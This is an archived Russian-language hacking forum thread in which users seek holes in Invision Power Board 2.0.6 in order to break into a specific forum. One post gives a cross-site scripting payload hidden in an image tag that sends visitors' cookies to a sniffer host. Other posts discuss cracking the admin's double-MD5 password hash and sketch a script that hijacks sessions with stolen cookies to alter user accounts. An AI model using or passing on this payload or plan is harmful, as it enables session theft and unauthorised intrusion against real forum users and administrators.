PDA

Просмотр полной версии : Вопрос про уязвимости в Ipb 2.0.6

Sh1z0iD
20.03.2005, 18:17
Уважаемые Х люди
кто знает уязвимость форума 2.0.6 ?
заранее благодарен :confused:
rsha1988
20.03.2005, 18:25
сниффер помойму можно туда вставить
CunningFox
20.03.2005, 19:03
да, снифф туда и точка :)
chip
20.03.2005, 19:12
А эксплоит есть для него?
rsha1988
20.03.2005, 19:27
http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http:/сниффер/me.jpg?K:"+document.cookie)
CunningFox
20.03.2005, 19:44
rsha1988 странноватый у тебя снифф..
(-=util=-)
20.03.2005, 21:57
а что с хэшом делать потом будем? :) Как с админкой быть? Я незнаю. :\
rsha1988
20.03.2005, 21:58
rsha1988 странноватый у тебя снифф..
Ошибся малось, щас все иправил...
rsha1988
20.03.2005, 21:58
а что с хэшом делать потом будем? :) Как с админкой быть? Я незнаю. :\
шутиш?! :D
(-=util=-)
20.03.2005, 22:01
я нешучу =) Ты попробуй сам расшифруй от вторых версий хэш =) Там не чистый md5 а вроде дважды зашифровывается. Т.е. пароль в md5 а потом ещё раз в md5... вообще надо в исходник форума глянуть!
chin
20.03.2005, 22:23
Попробуй глянь...... Там так все запутано, что я, 3 года просидевший только за php, не могу разобраться что к чему! ;)
Хотя, можно на досуге...
А вообще, надо искать иной путь, вместо того чтобы брутить хеш админа. Надо подумать - всегда есть альтернативный вариант.
Я тоже пробовать брутить пароль админа на IPB - безрезультатно.
Кстати, хочу написать скриптик:
- сниффит куки пользователя
- заходит с куками (в заголовке) на панель управления пользователя
- меняет ему аватару на нашу
- уходит ;)
Как вам идея? Я подумал, все взвесил - осуществимо!
(-=util=-)
20.03.2005, 22:30
Идея велеколепна. Ты представь сколько ламаков будет иметь форумы =\
chin
20.03.2005, 22:40
А ты представь, как админы после этого закопошатся в поисках дырок? :) Для них тогда хоть смысл их фиксить появится. А то сидят себе дырявые... хоть бы интересовались изредка...
rsha1988
20.03.2005, 22:53
Не, ну так просто и быстро форум ломать не интерессно - быстро надоест.
Лучше всетаки дооооолго брутить а потом получать удавольствие.
Sh1z0iD
21.03.2005, 16:24
сниффер помойму можно туда вставить

прости а как вставить я пробовал не вставляется
если представится возможность не мог бы ты снять видео ? :rolleyes: заранее благодарен...
CunningFox
22.03.2005, 12:40
форум хотябы в приват оставь, чтобы взглянуть что к чему..
Xalegi
22.03.2005, 12:43
дык... сам намути такой форум :)) как правило в последнее время для инвижиона ничего толком не меняется, так как считают, что он неуязвим =)))
эт нам на руку... пока на руку
CunningFox
22.03.2005, 12:48
дак у него Ipb форум?
Xalegi
22.03.2005, 12:50
как я понял... ДА :)
и вообще.. самое идеальное.. эт самому установить данный форум самому себе и изучать его изнутри... что и где может быть дырка =)
CunningFox
22.03.2005, 12:50
а не заметил названия топика :)
Sh1z0iD
23.03.2005, 15:03
дык... сам намути такой форум :)) как правило в последнее время для инвижиона ничего толком не меняется, так как считают, что он неуязвим =)))
эт нам на руку... пока на руку

вообще спасибо за совет
но у меня есть версия того форума которого я хочу поломать НО я не могу найти файл в котором описаны дыры не мог бы ты мне подсказать
какой файл ? а? :confused:
White Jordan
18.04.2005, 00:43
2.0.6 IPB не бывает. Самая последния верссия это 2.0.3

Он имел ввиду пхп. :rolleyes:
Manoz
18.04.2005, 21:26
Sdaetsya mne, chto eto phpbb 2.0.6. Ssi
ochkoi na forum-to podelis`, a?